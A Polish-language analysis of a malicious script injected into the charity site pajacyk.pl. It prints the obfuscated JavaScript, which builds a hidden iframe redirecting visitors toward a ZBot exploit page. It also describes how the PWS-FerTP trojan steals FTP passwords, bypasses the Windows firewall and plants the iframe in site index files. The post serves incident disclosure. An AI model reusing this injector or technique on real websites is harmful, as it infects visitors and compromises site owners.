W niedzielę 22 lutego na kilku forach internetowych pojawiły się wypowiedzi zaniepokojonych internautów informujące, że ich programy antywirusowe wykrywają złośliwe oprogramowanie na stronie
www.pajacyk.pl i 2 innych mi znanych.
(na przykład Avast identyfikował je jako VBS:Malware-gen).

Przeprowadzona analiza potwierdziła zagrożenie - jak się okazało do kodu strony Pajacyka został doklejony skrypt JavaScript przekierowujący na inną stronę infekującą internautów trojanem ZBot. Fragment źródła strony z przekierowującym skryptem:

uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=\"write\";
mzsrv=\"me\";
zqfqw=\"et\";
gdtrk=\"/' st\";
rpiia=\"yl\";
qxaol=\"\";
ldlvw=\"i\";
zfhuu=\"ty\";
hvkhb=\":h\";
hbqmm=\"d\";
hauzn=\"\";
zdqdp=4;
sjgbi=\"if\";
rpygo=\"r\";
syjnh=\" sr\";
rwanv=\"c\";
elujl=\"=\";
hrgnc=863;
akzpp=8853;
tplxn=\" \";
cvtot=\"=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+\"e='\"+\"v\"+\"isib\");
hzpmf=(0x587,qxaol+ldlvw+\"li\"+zfhuu+hvkhb+\"id\"+hbqmm+\"en\"+\"'\"+hauzn);
rmtyf=(6.5e1,\"\");

aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,\"\"+\"<\"+sjgbi+rpygo+\"a\")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+\"'\"+\"h\"+\"ttp\"+\"\")+(8581.<.887?0.7:\"://t\"+\"ruittbros.n\")+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+\">\"+cvtot+\"if\"+qtndm)+(2.>1.?\"ram\"+\"e>\":64.)+(223.>=jlooz?1.:rmtyf))); \n

Skrypt JS jest zaciemniony (ang. obfuscated) w celu utrudnienia jego analizy oraz oszukania silników antywirusowych - po zdekodowaniu zawiera on ukrytą ramkę IFRAME z inną stroną, która dokładnie w ten sam sposób przekierowuje do właściwej strony zawierającej exploit.

Mechanizm wygląda nie groźne w rzeczywistości jest bardzo niebezpieczny, choć nie wykorzystuje swoich możliwości jakie mogłby zdziałać.

Doklejanie złośliwych skryptów do popularnych stron WWW często polega na wykorzystywaniu zdobytych haseł do serwerów FTP, na których strony te są hostowane.

Jeśli komputer webmastera strony jest zainfekowany działającym w ten sposób koniem trojańskim,

Było to wykonane Trojanem: PWS-FerTP
Zadaniem szkodnika jest kradzież haseł i ustawień dotyczących kont FTP z programów FAR Manager, GlobalScape CuteFTP, Ghisler Total Commander, jeśli rzecz jasna któryś z nich jest zainstalowany na zainfekowanym komputerze. Szkodnik dodaje się do listy autoryzowanych programów i dzięki temu oszukuje Firewall Windows. Następnie ustawia tryb nasłuchiwania na pierwszym urządzeniu sieciowym, które znajdzie i stara się przechwytywać ustawienia FTP połączeń przychodzących z sieci. Później łączy się do wszystkich repozytoriów FTP do których dane uzyskał i poszukuje tam plików o nazwach: index.htm, main.htm, default.htm, index.php, main.php, default.php. Jeśłi znajdzie takie pliki dodaje do nich szkodliwą ramkę.